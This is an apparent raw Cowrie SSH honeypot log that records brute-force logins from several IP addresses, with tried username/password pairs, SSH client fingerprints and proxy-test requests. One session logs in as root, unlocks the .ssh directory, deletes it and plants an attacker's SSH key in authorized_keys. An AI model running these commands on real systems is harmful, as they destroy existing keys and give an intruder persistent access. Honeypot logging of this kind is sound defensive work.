@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:25.594514Z","src_ip":"213.209.150.239","session":"4de7b51e555a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:25.829767Z","src_ip":"213.209.150.239","session":"4de7b51e555a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":27508,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:27508","sensor":"my-vps","timestamp":"2025-08-26T01:08:25.877661Z","session":"4de7b51e555a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:25.925090Z","src_ip":"213.209.150.239","session":"4de7b51e555a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":21824,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:21824","sensor":"my-vps","timestamp":"2025-08-26T01:08:26.061417Z","session":"4de7b51e555a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:26.109595Z","src_ip":"213.209.150.239","session":"4de7b51e555a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:26.157792Z","src_ip":"213.209.150.239","session":"4de7b51e555a"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":37290,"dst_ip":"1.2.3.4","dst_port":22,"session":"b06b17450258","protocol":"ssh","message":"New connection: 27.112.78.170:37290 (1.2.3.4:22) [session: b06b17450258]","sensor":"my-vps","timestamp":"2025-08-26T01:09:26.450169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:09:26.451578Z","src_ip":"27.112.78.170","session":"b06b17450258"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:09:26.719397Z","src_ip":"27.112.78.170","session":"b06b17450258"}
{"eventid":"cowrie.login.failed","username":"sham","password":"sham123","message":"login attempt [sham/sham123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:09:27.856931Z","src_ip":"27.112.78.170","session":"b06b17450258"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:09:29.127301Z","src_ip":"27.112.78.170","session":"b06b17450258"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58674,"dst_ip":"1.2.3.4","dst_port":22,"session":"772ca4797c24","protocol":"ssh","message":"New connection: 217.72.205.35:58674 (1.2.3.4:22) [session: 772ca4797c24]","sensor":"my-vps","timestamp":"2025-08-26T01:09:30.039715Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:09:30.040765Z","src_ip":"217.72.205.35","session":"772ca4797c24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44786,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bdd9bd8a3a6","protocol":"ssh","message":"New connection: 212.227.235.229:44786 (1.2.3.4:22) [session: 3bdd9bd8a3a6]","sensor":"my-vps","timestamp":"2025-08-26T01:10:27.723711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:10:27.724809Z","src_ip":"212.227.235.229","session":"3bdd9bd8a3a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:10:27.974118Z","src_ip":"212.227.235.229","session":"3bdd9bd8a3a6"}
{"eventid":"cowrie.login.failed","username":"defi","password":"defi","message":"login attempt [defi/defi] failed","sensor":"my-vps","timestamp":"2025-08-26T01:10:28.986784Z","src_ip":"212.227.235.229","session":"3bdd9bd8a3a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46052,"dst_ip":"1.2.3.4","dst_port":23,"session":"da707fadd118","protocol":"telnet","message":"New connection: 212.227.235.229:46052 (1.2.3.4:23) [session: da707fadd118]","sensor":"my-vps","timestamp":"2025-08-26T01:10:29.645334Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:10:50.647291Z","src_ip":"212.227.125.160","session":"a91baadad469"}
{"eventid":"cowrie.session.closed","duration":180.17860913276672,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:10:50.651945Z","src_ip":"212.227.125.160","session":"a91baadad469"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":43728,"dst_ip":"1.2.3.4","dst_port":22,"session":"f84175977ef6","protocol":"ssh","message":"New connection: 27.112.78.170:43728 (1.2.3.4:22) [session: f84175977ef6]","sensor":"my-vps","timestamp":"2025-08-26T01:10:55.020039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:10:55.020945Z","src_ip":"27.112.78.170","session":"f84175977ef6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:10:55.279898Z","src_ip":"27.112.78.170","session":"f84175977ef6"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"zaq1@WSX","message":"login attempt [ubuntu/zaq1@WSX] failed","sensor":"my-vps","timestamp":"2025-08-26T01:10:56.359132Z","src_ip":"27.112.78.170","session":"f84175977ef6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:10:57.627027Z","src_ip":"27.112.78.170","session":"f84175977ef6"}
{"eventid":"cowrie.session.closed","duration":30.776429653167725,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:11:00.421662Z","src_ip":"212.227.235.229","session":"da707fadd118"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36872,"dst_ip":"1.2.3.4","dst_port":22,"session":"44ebcc240f9b","protocol":"ssh","message":"New connection: 212.227.125.160:36872 (1.2.3.4:22) [session: 44ebcc240f9b]","sensor":"my-vps","timestamp":"2025-08-26T01:12:19.847361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:12:19.848299Z","src_ip":"212.227.125.160","session":"44ebcc240f9b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:12:19.939334Z","src_ip":"212.227.125.160","session":"44ebcc240f9b"}
{"eventid":"cowrie.login.failed","username":"ingres","password":"ingres","message":"login attempt [ingres/ingres] failed","sensor":"my-vps","timestamp":"2025-08-26T01:12:20.687683Z","src_ip":"212.227.125.160","session":"44ebcc240f9b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:12:21.947534Z","src_ip":"212.227.125.160","session":"44ebcc240f9b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":36812,"dst_ip":"1.2.3.4","dst_port":22,"session":"b750feae2ea7","protocol":"ssh","message":"New connection: 27.112.78.170:36812 (1.2.3.4:22) [session: b750feae2ea7]","sensor":"my-vps","timestamp":"2025-08-26T01:12:23.036762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:12:23.038464Z","src_ip":"27.112.78.170","session":"b750feae2ea7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:12:23.297261Z","src_ip":"27.112.78.170","session":"b750feae2ea7"}
{"eventid":"cowrie.login.success","username":"root","password":"zhu88jie","message":"login attempt [root/zhu88jie] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:12:24.336100Z","src_ip":"27.112.78.170","session":"b750feae2ea7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:12:24.906635Z","src_ip":"27.112.78.170","session":"b750feae2ea7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:12:24.907643Z","src_ip":"27.112.78.170","session":"b750feae2ea7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:12:24.909214Z","src_ip":"27.112.78.170","session":"b750feae2ea7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:12:25.170000Z","src_ip":"27.112.78.170","session":"b750feae2ea7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:12:25.746170Z","src_ip":"27.112.78.170","session":"b750feae2ea7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T01:12:25.747079Z","src_ip":"27.112.78.170","session":"b750feae2ea7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T01:12:26.008690Z","src_ip":"27.112.78.170","session":"b750feae2ea7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:12:26.009579Z","src_ip":"27.112.78.170","session":"b750feae2ea7"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":36822,"dst_ip":"1.2.3.4","dst_port":22,"session":"78a8a34e33cc","protocol":"ssh","message":"New connection: 27.112.78.170:36822 (1.2.3.4:22) [session: 78a8a34e33cc]","sensor":"my-vps","timestamp":"2025-08-26T01:12:26.275837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:12:26.276728Z","src_ip":"27.112.78.170","session":"78a8a34e33cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:12:26.544326Z","src_ip":"27.112.78.170","session":"78a8a34e33cc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T01:12:27.656702Z","src_ip":"27.112.78.170","session":"78a8a34e33cc"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:12:27.724973Z","src_ip":"212.227.235.229","session":"3bdd9bd8a3a6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:12:28.926442Z","src_ip":"27.112.78.170","session":"78a8a34e33cc"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":44784,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4ac00627303","protocol":"ssh","message":"New connection: 27.112.78.170:44784 (1.2.3.4:22) [session: f4ac00627303]","sensor":"my-vps","timestamp":"2025-08-26T01:12:29.184011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:12:29.184989Z","src_ip":"27.112.78.170","session":"f4ac00627303"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:12:29.443845Z","src_ip":"27.112.78.170","session":"f4ac00627303"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:12:30.520372Z","src_ip":"27.112.78.170","session":"f4ac00627303"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:12:30.780305Z","src_ip":"27.112.78.170","session":"f4ac00627303"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:12:30.781514Z","src_ip":"27.112.78.170","session":"b750feae2ea7"}
{"eventid":"cowrie.session.connect","src_ip":"66.240.236.116","src_port":34496,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad6f9a76d3f1","protocol":"ssh","message":"New connection: 66.240.236.116:34496 (1.2.3.4:22) [session: ad6f9a76d3f1]","sensor":"my-vps","timestamp":"2025-08-26T01:12:54.056139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:12:54.105151Z","src_ip":"66.240.236.116","session":"ad6f9a76d3f1"}
